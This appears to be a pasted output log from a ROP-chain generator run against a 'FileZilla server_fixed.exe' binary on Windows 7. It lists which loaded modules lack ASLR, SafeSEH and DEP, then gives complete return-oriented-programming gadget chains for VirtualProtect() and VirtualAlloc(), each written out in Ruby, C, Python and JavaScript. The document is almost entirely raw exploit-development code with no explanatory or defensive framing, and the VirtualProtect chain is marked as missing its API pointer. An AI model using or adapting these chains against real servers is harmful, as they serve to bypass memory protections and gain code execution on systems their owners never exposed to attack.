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Nov 24th, 2014
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text 23.19 KB | None | 0 0
  1. ----------------------------------------------------------------------------------------------------------------------------------
  2. Module info :
  3. ----------------------------------------------------------------------------------------------------------------------------------
  4. Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version, Modulename & Path
  5. ----------------------------------------------------------------------------------------------------------------------------------
  6. 0x756c0000 | 0x757dd000 | 0x0011d000 | True | True | True | True | True | 6.1.7600.16385 [CRYPT32.dll] (C:\Windows\system32\CRYPT32.dll)
  7. 0x75630000 | 0x7563c000 | 0x0000c000 | True | True | True | True | True | 6.1.7601.17514 [MSASN1.dll] (C:\Windows\system32\MSASN1.dll)
  8. 0x74ff0000 | 0x74ff6000 | 0x00006000 | True | True | True | True | True | 6.1.7600.16385 [wship6.dll] (C:\Windows\System32\wship6.dll)
  9. 0x772c0000 | 0x77394000 | 0x000d4000 | True | True | True | True | True | 6.1.7600.16385 [kernel32.dll] (C:\Windows\system32\kernel32.dll)
  10. 0x758c0000 | 0x7596c000 | 0x000ac000 | True | True | True | True | True | 7.0.7600.16385 [msvcrt.dll] (C:\Windows\system32\msvcrt.dll)
  11. 0x77470000 | 0x775ac000 | 0x0013c000 | True | True | True | True | True | 6.1.7600.16385 [ntdll.dll] (C:\Windows\SYSTEM32\ntdll.dll)
  12. 0x76200000 | 0x76219000 | 0x00019000 | True | True | True | True | True | 6.1.7600.16385 [sechost.dll] (C:\Windows\SYSTEM32\sechost.dll)
  13. 0x74ad0000 | 0x74ad5000 | 0x00005000 | True | True | True | True | True | 6.1.7600.16385 [wshtcpip.dll] (C:\Windows\System32\wshtcpip.dll)
  14. 0x775b0000 | 0x775ba000 | 0x0000a000 | True | True | True | True | True | 6.1.7600.16385 [LPK.dll] (C:\Windows\system32\LPK.dll)
  15. 0x75c80000 | 0x75d1d000 | 0x0009d000 | True | True | True | True | True | 1.0626.7601.17514 [USP10.dll] (C:\Windows\system32\USP10.dll)
  16. 0x773a0000 | 0x77469000 | 0x000c9000 | True | True | True | True | True | 6.1.7601.17514 [USER32.dll] (C:\Windows\system32\USER32.dll)
  17. 0x75e00000 | 0x75ea1000 | 0x000a1000 | True | True | True | True | True | 6.1.7600.16385 [RPCRT4.dll] (C:\Windows\system32\RPCRT4.dll)
  18. 0x761e0000 | 0x761ff000 | 0x0001f000 | True | True | True | True | True | 6.1.7601.17514 [IMM32.DLL] (C:\Windows\system32\IMM32.DLL)
  19. 0x71c60000 | 0x71c66000 | 0x00006000 | True | True | True | True | True | 6.1.7600.16385 [wls0wndh.dll] (C:\Windows\system32\wls0wndh.dll)
  20. 0x775c0000 | 0x775c6000 | 0x00006000 | True | True | True | True | True | 6.1.7600.16385 [NSI.dll] (C:\Windows\system32\NSI.dll)
  21. 0x771f0000 | 0x772bc000 | 0x000cc000 | True | True | True | True | True | 6.1.7600.16385 [MSCTF.dll] (C:\Windows\system32\MSCTF.dll)
  22. 0x75670000 | 0x756ba000 | 0x0004a000 | True | True | True | True | True | 6.1.7600.16385 [KERNELBASE.dll] (C:\Windows\system32\KERNELBASE.dll)
  23. 0x74bb0000 | 0x74bb9000 | 0x00009000 | True | True | True | True | True | 6.1.7600.16385 [VERSION.dll] (C:\Windows\system32\VERSION.dll)
  24. 0x75000000 | 0x7503c000 | 0x0003c000 | True | True | True | True | True | 6.1.7600.16385 [mswsock.dll] (C:\Windows\system32\mswsock.dll)
  25. 0x770a0000 | 0x770ee000 | 0x0004e000 | True | True | True | True | True | 6.1.7601.17514 [GDI32.dll] (C:\Windows\system32\GDI32.dll)
  26. 0x10000000 | 0x100a1000 | 0x000a1000 | False | False | False | False | False | [FileZilla server_fixed.exe] (C:\Users\win7\Desktop\ftp\FileZilla server_fixed.exe)
  27. 0x77600000 | 0x776a0000 | 0x000a0000 | True | True | True | True | True | 6.1.7600.16385 [ADVAPI32.dll] (C:\Windows\system32\ADVAPI32.dll)
  28. 0x75c40000 | 0x75c75000 | 0x00035000 | True | True | True | True | True | 6.1.7600.16385 [WS2_32.dll] (C:\Windows\system32\WS2_32.dll)
  29. ----------------------------------------------------------------------------------------------------------------------------------
  31. ################################################################################
  33. Register setup for VirtualProtect() :
  34. --------------------------------------------
  35. EAX = NOP (0x90909090)
  36. ECX = lpOldProtect (ptr to W address)
  37. EDX = NewProtect (0x40)
  38. EBX = dwSize
  39. ESP = lPAddress (automatic)
  40. EBP = ReturnTo (ptr to jmp esp)
  41. ESI = ptr to VirtualProtect()
  42. EDI = ROP NOP (RETN)
  43. --- alternative chain ---
  44. EAX = tr to &VirtualProtect()
  45. ECX = lpOldProtect (ptr to W address)
  46. EDX = NewProtect (0x40)
  47. EBX = dwSize
  48. ESP = lPAddress (automatic)
  49. EBP = POP (skip 4 bytes)
  50. ESI = ptr to JMP [EAX]
  51. EDI = ROP NOP (RETN)
  52. + place ptr to "jmp esp" on stack, below PUSHAD
  53. --------------------------------------------
  56. ROP Chain for VirtualProtect() [(XP/2003 Server and up)] :
  57. ----------------------------------------------------------
  59. *** [ Ruby ] ***
  61. def create_rop_chain()
  63. # rop chain generated with -
  64. rop_gadgets =
  65. [
  66. 0x00 00 00 00, # [-] Unable to find API pointer -> eax
  67. 0x10 07 89 40, # MOV EAX,DWORD PTR DS:[EAX] # POP ESI # POP EBP # RETN [FileZilla server_fixed.exe]
  68. 0x41 41 41 41, # Filler (compensate)
  69. 0x41 41 41 41, # Filler (compensate)
  70. 0x10 02 f7 f0, # PUSH EAX # ADD AL,8B # DEC ESI # PUSHAD # MOV DWORD PTR DS:[EAX+8],ECX # MOV EDX,DWORD PTR DS:[ESI+64] # ADD ESP,4 # MOV DWORD PTR DS:[EAX+C],EDX # POP ESI # RETN [FileZilla server_fixed.exe]
  71. 0x10 06 31 96, # POP EBP # RETN [FileZilla server_fixed.exe]
  72. 0x10 02 35 1a, # & push esp # ret [FileZilla server_fixed.exe]
  73. 0x10 02 2a 13, # POP EBX # RETN [FileZilla server_fixed.exe]
  74. 0x00 00 02 01, # 0x00000201-> ebx
  75. 0x10 05 57 be, # POP EBX # RETN [FileZilla server_fixed.exe]
  76. 0x00 00 00 40, # 0x00000040-> edx
  77. 0x10 07 c0 5c, # XOR EDX,EDX # RETN [FileZilla server_fixed.exe]
  78. 0x10 07 8e 3e, # ADD EDX,EBX # POP EBX # RETN 0x10 [FileZilla server_fixed.exe]
  79. 0x41 41 41 41, # Filler (compensate)
  80. 0x10 07 e8 d3, # POP ECX # RETN [FileZilla server_fixed.exe]
  81. 0x41 41 41 41, # Filler (RETN offset compensation)
  82. 0x41 41 41 41, # Filler (RETN offset compensation)
  83. 0x41 41 41 41, # Filler (RETN offset compensation)
  84. 0x41 41 41 41, # Filler (RETN offset compensation)
  85. 0x10 09 a0 62, # &Writable location [FileZilla server_fixed.exe]
  86. 0x10 05 2a 65, # POP EDI # RETN [FileZilla server_fixed.exe]
  87. 0x10 06 88 84, # RETN (ROP NOP) [FileZilla server_fixed.exe]
  88. 0x10 02 ae af, # POP EAX # RETN [FileZilla server_fixed.exe]
  89. 0x90 90 90 90, # nop
  90. 0x10 04 e7 42, # PUSHAD # RETN 0x04 [FileZilla server_fixed.exe]
  91. ].flatten.pack("V*")
  93. return rop_gadgets
  95. end
  98. # Call the ROP chain generator inside the 'exploit' function :
  101. rop_chain = create_rop_chain()
  105. *** [ C ] ***
  107. #define CREATE_ROP_CHAIN(name, ...) \
  108. int name##_length = create_rop_chain(NULL, ##__VA_ARGS__); \
  109. unsigned int name[name##_length / sizeof(unsigned int)]; \
  110. create_rop_chain(name, ##__VA_ARGS__);
  112. int create_rop_chain(unsigned int *buf, unsigned int )
  113. {
  114. // rop chain generated with -
  115. unsigned int rop_gadgets[] = {
  116. 0x00000000, // [-] Unable to find API pointer -> eax
  117. 0x10078940, // MOV EAX,DWORD PTR DS:[EAX] // POP ESI // POP EBP // RETN [FileZilla server_fixed.exe]
  118. 0x41414141, // Filler (compensate)
  119. 0x41414141, // Filler (compensate)
  120. 0x1002f7f0, // PUSH EAX // ADD AL,8B // DEC ESI // PUSHAD // MOV DWORD PTR DS:[EAX+8],ECX // MOV EDX,DWORD PTR DS:[ESI+64] // ADD ESP,4 // MOV DWORD PTR DS:[EAX+C],EDX // POP ESI // RETN [FileZilla server_fixed.exe]
  121. 0x10063196, // POP EBP // RETN [FileZilla server_fixed.exe]
  122. 0x1002351a, // & push esp // ret [FileZilla server_fixed.exe]
  123. 0x10022a13, // POP EBX // RETN [FileZilla server_fixed.exe]
  124. 0x00000201, // 0x00000201-> ebx
  125. 0x100557be, // POP EBX // RETN [FileZilla server_fixed.exe]
  126. 0x00000040, // 0x00000040-> edx
  127. 0x1007c05c, // XOR EDX,EDX // RETN [FileZilla server_fixed.exe]
  128. 0x10078e3e, // ADD EDX,EBX // POP EBX // RETN 0x10 [FileZilla server_fixed.exe]
  129. 0x41414141, // Filler (compensate)
  130. 0x1007e8d3, // POP ECX // RETN [FileZilla server_fixed.exe]
  131. 0x41414141, // Filler (RETN offset compensation)
  132. 0x41414141, // Filler (RETN offset compensation)
  133. 0x41414141, // Filler (RETN offset compensation)
  134. 0x41414141, // Filler (RETN offset compensation)
  135. 0x1009a062, // &Writable location [FileZilla server_fixed.exe]
  136. 0x10052a65, // POP EDI // RETN [FileZilla server_fixed.exe]
  137. 0x10068884, // RETN (ROP NOP) [FileZilla server_fixed.exe]
  138. 0x1002aeaf, // POP EAX // RETN [FileZilla server_fixed.exe]
  139. 0x90909090, // nop
  140. 0x1004e742, // PUSHAD // RETN 0x04 [FileZilla server_fixed.exe]
  141. };
  142. if(buf != NULL) {
  143. memcpy(buf, rop_gadgets, sizeof(rop_gadgets));
  144. };
  145. return sizeof(rop_gadgets);
  146. }
  148. // use the 'rop_chain' variable after this call, it's just an unsigned int[]
  149. CREATE_ROP_CHAIN(rop_chain, );
  150. // alternatively just allocate a large enough buffer and get the rop chain, i.e.:
  151. // unsigned int rop_chain[256];
  152. // int rop_chain_length = create_rop_chain(rop_chain, );
  154. *** [ Python ] ***
  156. def create_rop_chain():
  158. # rop chain generated with -
  159. rop_gadgets = [
  160. 0x00000000, # [-] Unable to find API pointer -> eax
  161. 0x10078940, # MOV EAX,DWORD PTR DS:[EAX] # POP ESI # POP EBP # RETN [FileZilla server_fixed.exe]
  162. 0x41414141, # Filler (compensate)
  163. 0x41414141, # Filler (compensate)
  164. 0x1002f7f0, # PUSH EAX # ADD AL,8B # DEC ESI # PUSHAD # MOV DWORD PTR DS:[EAX+8],ECX # MOV EDX,DWORD PTR DS:[ESI+64] # ADD ESP,4 # MOV DWORD PTR DS:[EAX+C],EDX # POP ESI # RETN [FileZilla server_fixed.exe]
  165. 0x10063196, # POP EBP # RETN [FileZilla server_fixed.exe]
  166. 0x1002351a, # & push esp # ret [FileZilla server_fixed.exe]
  167. 0x10022a13, # POP EBX # RETN [FileZilla server_fixed.exe]
  168. 0x00000201, # 0x00000201-> ebx
  169. 0x100557be, # POP EBX # RETN [FileZilla server_fixed.exe]
  170. 0x00000040, # 0x00000040-> edx
  171. 0x1007c05c, # XOR EDX,EDX # RETN [FileZilla server_fixed.exe]
  172. 0x10078e3e, # ADD EDX,EBX # POP EBX # RETN 0x10 [FileZilla server_fixed.exe]
  173. 0x41414141, # Filler (compensate)
  174. 0x1007e8d3, # POP ECX # RETN [FileZilla server_fixed.exe]
  175. 0x41414141, # Filler (RETN offset compensation)
  176. 0x41414141, # Filler (RETN offset compensation)
  177. 0x41414141, # Filler (RETN offset compensation)
  178. 0x41414141, # Filler (RETN offset compensation)
  179. 0x1009a062, # &Writable location [FileZilla server_fixed.exe]
  180. 0x10052a65, # POP EDI # RETN [FileZilla server_fixed.exe]
  181. 0x10068884, # RETN (ROP NOP) [FileZilla server_fixed.exe]
  182. 0x1002aeaf, # POP EAX # RETN [FileZilla server_fixed.exe]
  183. 0x90909090, # nop
  184. 0x1004e742, # PUSHAD # RETN 0x04 [FileZilla server_fixed.exe]
  185. ]
  186. return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
  188. rop_chain = create_rop_chain()
  192. *** [ JavaScript ] ***
  194. //rop chain generated with -
  195. rop_gadgets = unescape(
  196. "%u0000%u0000" + // 0x00000000 : ,# [-] Unable to find API pointer -> eax
  197. "%u8940%u1007" + // 0x10078940 : ,# MOV EAX,DWORD PTR DS:[EAX] # POP ESI # POP EBP # RETN [FileZilla server_fixed.exe]
  198. "%u4141%u4141" + // 0x41414141 : ,# Filler (compensate)
  199. "%u4141%u4141" + // 0x41414141 : ,# Filler (compensate)
  200. "%uf7f0%u1002" + // 0x1002f7f0 : ,# PUSH EAX # ADD AL,8B # DEC ESI # PUSHAD # MOV DWORD PTR DS:[EAX+8],ECX # MOV EDX,DWORD PTR DS:[ESI+64] # ADD ESP,4 # MOV DWORD PTR DS:[EAX+C],EDX # POP ESI # RETN [FileZilla server_fixed.exe]
  201. "%u3196%u1006" + // 0x10063196 : ,# POP EBP # RETN [FileZilla server_fixed.exe]
  202. "%u351a%u1002" + // 0x1002351a : ,# & push esp # ret[FileZilla server_fixed.exe]
  203. "%u2a13%u1002" + // 0x10022a13 : ,# POP EBX # RETN [FileZilla server_fixed.exe]
  204. "%u0201%u0000" + // 0x00000201 : ,# 0x00000201-> ebx
  205. "%u57be%u1005" + // 0x100557be : ,# POP EBX # RETN [FileZilla server_fixed.exe]
  206. "%u0040%u0000" + // 0x00000040 : ,# 0x00000040-> edx
  207. "%uc05c%u1007" + // 0x1007c05c : ,# XOR EDX,EDX # RETN [FileZilla server_fixed.exe]
  208. "%u8e3e%u1007" + // 0x10078e3e : ,# ADD EDX,EBX # POP EBX # RETN 0x10 [FileZilla server_fixed.exe]
  209. "%u4141%u4141" + // 0x41414141 : ,# Filler (compensate)
  210. "%ue8d3%u1007" + // 0x1007e8d3 : ,# POP ECX # RETN [FileZilla server_fixed.exe]
  211. "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
  212. "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
  213. "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
  214. "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
  215. "%ua062%u1009" + // 0x1009a062 : ,# &Writable location [FileZilla server_fixed.exe]
  216. "%u2a65%u1005" + // 0x10052a65 : ,# POP EDI # RETN [FileZilla server_fixed.exe]
  217. "%u8884%u1006" + // 0x10068884 : ,# RETN (ROP NOP) [FileZilla server_fixed.exe]
  218. "%uaeaf%u1002" + // 0x1002aeaf : ,# POP EAX # RETN [FileZilla server_fixed.exe]
  219. "%u9090%u9090" + // 0x90909090 : ,# nop
  220. "%ue742%u1004" + // 0x1004e742 : ,# PUSHAD # RETN 0x04 [FileZilla server_fixed.exe]
  221. ""); // :
  224. --------------------------------------------------------------------------------------------------
  227. ################################################################################
  229. Register setup for VirtualAlloc() :
  230. --------------------------------------------
  231. EAX = NOP (0x90909090)
  232. ECX = flProtect (0x40)
  233. EDX = flAllocationType (0x1000)
  234. EBX = dwSize
  235. ESP = lpAddress (automatic)
  236. EBP = ReturnTo (ptr to jmp esp)
  237. ESI = ptr to VirtualAlloc()
  238. EDI = ROP NOP (RETN)
  239. --- alternative chain ---
  240. EAX = ptr to &VirtualAlloc()
  241. ECX = flProtect (0x40)
  242. EDX = flAllocationType (0x1000)
  243. EBX = dwSize
  244. ESP = lpAddress (automatic)
  245. EBP = POP (skip 4 bytes)
  246. ESI = ptr to JMP [EAX]
  247. EDI = ROP NOP (RETN)
  248. + place ptr to "jmp esp" on stack, below PUSHAD
  249. --------------------------------------------
  252. ROP Chain for VirtualAlloc() [(XP/2003 Server and up)] :
  253. --------------------------------------------------------
  255. *** [ Ruby ] ***
  257. def create_rop_chain()
  259. # rop chain generated with -
  260. rop_gadgets =
  261. [
  262. 0x1004388a, # POP ESI # RETN [FileZilla server_fixed.exe]
  263. 0x10082148, # ptr to &VirtualAlloc() [IAT FileZilla server_fixed.exe]
  264. 0x1000c99f, # MOV EAX,DWORD PTR DS:[ESI] # POP ESI # POP ECX # RETN [FileZilla server_fixed.exe]
  265. 0x41414141, # Filler (compensate)
  266. 0x41414141, # Filler (compensate)
  267. 0x1002f7f0, # PUSH EAX # ADD AL,8B # DEC ESI # PUSHAD # MOV DWORD PTR DS:[EAX+8],ECX # MOV EDX,DWORD PTR DS:[ESI+64] # ADD ESP,4 # MOV DWORD PTR DS:[EAX+C],EDX # POP ESI # RETN [FileZilla server_fixed.exe]
  268. 0x1005e2e1, # POP EBP # RETN [FileZilla server_fixed.exe]
  269. 0x10007dba, # & push esp # ret [FileZilla server_fixed.exe]
  270. 0x100681a5, # POP EBX # RETN [FileZilla server_fixed.exe]
  271. 0x00000001, # 0x00000001-> ebx
  272. 0x10055082, # POP EBX # RETN [FileZilla server_fixed.exe]
  273. 0x00001000, # 0x00001000-> edx
  274. 0x1007c05c, # XOR EDX,EDX # RETN [FileZilla server_fixed.exe]
  275. 0x10078e3e, # ADD EDX,EBX # POP EBX # RETN 0x10 [FileZilla server_fixed.exe]
  276. 0x41414141, # Filler (compensate)
  277. 0x10080d44, # POP ECX # RETN [FileZilla server_fixed.exe]
  278. 0x41414141, # Filler (RETN offset compensation)
  279. 0x41414141, # Filler (RETN offset compensation)
  280. 0x41414141, # Filler (RETN offset compensation)
  281. 0x41414141, # Filler (RETN offset compensation)
  282. 0x00000040, # 0x00000040-> ecx
  283. 0x10066f18, # POP EDI # RETN [FileZilla server_fixed.exe]
  284. 0x10068884, # RETN (ROP NOP) [FileZilla server_fixed.exe]
  285. 0x1002aeaf, # POP EAX # RETN [FileZilla server_fixed.exe]
  286. 0x90909090, # nop
  287. 0x10014f48, # PUSHAD # RETN 0x0C [FileZilla server_fixed.exe]
  288. ].flatten.pack("V*")
  290. return rop_gadgets
  292. end
  295. # Call the ROP chain generator inside the 'exploit' function :
  298. rop_chain = create_rop_chain()
  302. *** [ C ] ***
  304. #define CREATE_ROP_CHAIN(name, ...) \
  305. int name##_length = create_rop_chain(NULL, ##__VA_ARGS__); \
  306. unsigned int name[name##_length / sizeof(unsigned int)]; \
  307. create_rop_chain(name, ##__VA_ARGS__);
  309. int create_rop_chain(unsigned int *buf, unsigned int )
  310. {
  311. // rop chain generated with -
  312. unsigned int rop_gadgets[] = {
  313. 0x1004388a, // POP ESI // RETN [FileZilla server_fixed.exe]
  314. 0x10082148, // ptr to &VirtualAlloc() [IAT FileZilla server_fixed.exe]
  315. 0x1000c99f, // MOV EAX,DWORD PTR DS:[ESI] // POP ESI // POP ECX // RETN [FileZilla server_fixed.exe]
  316. 0x41414141, // Filler (compensate)
  317. 0x41414141, // Filler (compensate)
  318. 0x1002f7f0, // PUSH EAX // ADD AL,8B // DEC ESI // PUSHAD // MOV DWORD PTR DS:[EAX+8],ECX // MOV EDX,DWORD PTR DS:[ESI+64] // ADD ESP,4 // MOV DWORD PTR DS:[EAX+C],EDX // POP ESI // RETN [FileZilla server_fixed.exe]
  319. 0x1005e2e1, // POP EBP // RETN [FileZilla server_fixed.exe]
  320. 0x10007dba, // & push esp // ret [FileZilla server_fixed.exe]
  321. 0x100681a5, // POP EBX // RETN [FileZilla server_fixed.exe]
  322. 0x00000001, // 0x00000001-> ebx
  323. 0x10055082, // POP EBX // RETN [FileZilla server_fixed.exe]
  324. 0x00001000, // 0x00001000-> edx
  325. 0x1007c05c, // XOR EDX,EDX // RETN [FileZilla server_fixed.exe]
  326. 0x10078e3e, // ADD EDX,EBX // POP EBX // RETN 0x10 [FileZilla server_fixed.exe]
  327. 0x41414141, // Filler (compensate)
  328. 0x10080d44, // POP ECX // RETN [FileZilla server_fixed.exe]
  329. 0x41414141, // Filler (RETN offset compensation)
  330. 0x41414141, // Filler (RETN offset compensation)
  331. 0x41414141, // Filler (RETN offset compensation)
  332. 0x41414141, // Filler (RETN offset compensation)
  333. 0x00000040, // 0x00000040-> ecx
  334. 0x10066f18, // POP EDI // RETN [FileZilla server_fixed.exe]
  335. 0x10068884, // RETN (ROP NOP) [FileZilla server_fixed.exe]
  336. 0x1002aeaf, // POP EAX // RETN [FileZilla server_fixed.exe]
  337. 0x90909090, // nop
  338. 0x10014f48, // PUSHAD // RETN 0x0C [FileZilla server_fixed.exe]
  339. };
  340. if(buf != NULL) {
  341. memcpy(buf, rop_gadgets, sizeof(rop_gadgets));
  342. };
  343. return sizeof(rop_gadgets);
  344. }
  346. // use the 'rop_chain' variable after this call, it's just an unsigned int[]
  347. CREATE_ROP_CHAIN(rop_chain, );
  348. // alternatively just allocate a large enough buffer and get the rop chain, i.e.:
  349. // unsigned int rop_chain[256];
  350. // int rop_chain_length = create_rop_chain(rop_chain, );
  352. *** [ Python ] ***
  354. def create_rop_chain():
  356. # rop chain generated with -
  357. rop_gadgets = [
  358. 0x1004388a, # POP ESI # RETN [FileZilla server_fixed.exe]
  359. 0x10082148, # ptr to &VirtualAlloc() [IAT FileZilla server_fixed.exe]
  360. 0x1000c99f, # MOV EAX,DWORD PTR DS:[ESI] # POP ESI # POP ECX # RETN [FileZilla server_fixed.exe]
  361. 0x41414141, # Filler (compensate)
  362. 0x41414141, # Filler (compensate)
  363. 0x1002f7f0, # PUSH EAX # ADD AL,8B # DEC ESI # PUSHAD # MOV DWORD PTR DS:[EAX+8],ECX # MOV EDX,DWORD PTR DS:[ESI+64] # ADD ESP,4 # MOV DWORD PTR DS:[EAX+C],EDX # POP ESI # RETN [FileZilla server_fixed.exe]
  364. 0x1005e2e1, # POP EBP # RETN [FileZilla server_fixed.exe]
  365. 0x10007dba, # & push esp # ret [FileZilla server_fixed.exe]
  366. 0x100681a5, # POP EBX # RETN [FileZilla server_fixed.exe]
  367. 0x00000001, # 0x00000001-> ebx
  368. 0x10055082, # POP EBX # RETN [FileZilla server_fixed.exe]
  369. 0x00001000, # 0x00001000-> edx
  370. 0x1007c05c, # XOR EDX,EDX # RETN [FileZilla server_fixed.exe]
  371. 0x10078e3e, # ADD EDX,EBX # POP EBX # RETN 0x10 [FileZilla server_fixed.exe]
  372. 0x41414141, # Filler (compensate)
  373. 0x10080d44, # POP ECX # RETN [FileZilla server_fixed.exe]
  374. 0x41414141, # Filler (RETN offset compensation)
  375. 0x41414141, # Filler (RETN offset compensation)
  376. 0x41414141, # Filler (RETN offset compensation)
  377. 0x41414141, # Filler (RETN offset compensation)
  378. 0x00000040, # 0x00000040-> ecx
  379. 0x10066f18, # POP EDI # RETN [FileZilla server_fixed.exe]
  380. 0x10068884, # RETN (ROP NOP) [FileZilla server_fixed.exe]
  381. 0x1002aeaf, # POP EAX # RETN [FileZilla server_fixed.exe]
  382. 0x90909090, # nop
  383. 0x10014f48, # PUSHAD # RETN 0x0C [FileZilla server_fixed.exe]
  384. ]
  385. return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
  387. rop_chain = create_rop_chain()
  391. *** [ JavaScript ] ***
  393. //rop chain generated with -
  394. rop_gadgets = unescape(
  395. "%u388a%u1004" + // 0x1004388a : ,# POP ESI # RETN [FileZilla server_fixed.exe]
  396. "%u2148%u1008" + // 0x10082148 : ,# ptr to &VirtualAlloc() [IAT FileZilla server_fixed.exe]
  397. "%uc99f%u1000" + // 0x1000c99f : ,# MOV EAX,DWORD PTR DS:[ESI] # POP ESI # POP ECX # RETN [FileZilla server_fixed.exe]
  398. "%u4141%u4141" + // 0x41414141 : ,# Filler (compensate)
  399. "%u4141%u4141" + // 0x41414141 : ,# Filler (compensate)
  400. "%uf7f0%u1002" + // 0x1002f7f0 : ,# PUSH EAX # ADD AL,8B # DEC ESI # PUSHAD # MOV DWORD PTR DS:[EAX+8],ECX # MOV EDX,DWORD PTR DS:[ESI+64] # ADD ESP,4 # MOV DWORD PTR DS:[EAX+C],EDX # POP ESI # RETN [FileZilla server_fixed.exe]
  401. "%ue2e1%u1005" + // 0x1005e2e1 : ,# POP EBP # RETN [FileZilla server_fixed.exe]
  402. "%u7dba%u1000" + // 0x10007dba : ,# & push esp # ret[FileZilla server_fixed.exe]
  403. "%u81a5%u1006" + // 0x100681a5 : ,# POP EBX # RETN [FileZilla server_fixed.exe]
  404. "%u0001%u0000" + // 0x00000001 : ,# 0x00000001-> ebx
  405. "%u5082%u1005" + // 0x10055082 : ,# POP EBX # RETN [FileZilla server_fixed.exe]
  406. "%u1000%u0000" + // 0x00001000 : ,# 0x00001000-> edx
  407. "%uc05c%u1007" + // 0x1007c05c : ,# XOR EDX,EDX # RETN [FileZilla server_fixed.exe]
  408. "%u8e3e%u1007" + // 0x10078e3e : ,# ADD EDX,EBX # POP EBX # RETN 0x10 [FileZilla server_fixed.exe]
  409. "%u4141%u4141" + // 0x41414141 : ,# Filler (compensate)
  410. "%u0d44%u1008" + // 0x10080d44 : ,# POP ECX # RETN [FileZilla server_fixed.exe]
  411. "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
  412. "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
  413. "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
  414. "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
  415. "%u0040%u0000" + // 0x00000040 : ,# 0x00000040-> ecx
  416. "%u6f18%u1006" + // 0x10066f18 : ,# POP EDI # RETN [FileZilla server_fixed.exe]
  417. "%u8884%u1006" + // 0x10068884 : ,# RETN (ROP NOP) [FileZilla server_fixed.exe]
  418. "%uaeaf%u1002" + // 0x1002aeaf : ,# POP EAX # RETN [FileZilla server_fixed.exe]
  419. "%u9090%u9090" + // 0x90909090 : ,# nop
  420. "%u4f48%u1001" + // 0x10014f48 : ,# PUSHAD # RETN 0x0C [FileZilla server_fixed.exe]
  421. ""); // :
  424. --------------------------------------------------------------------------------------------------
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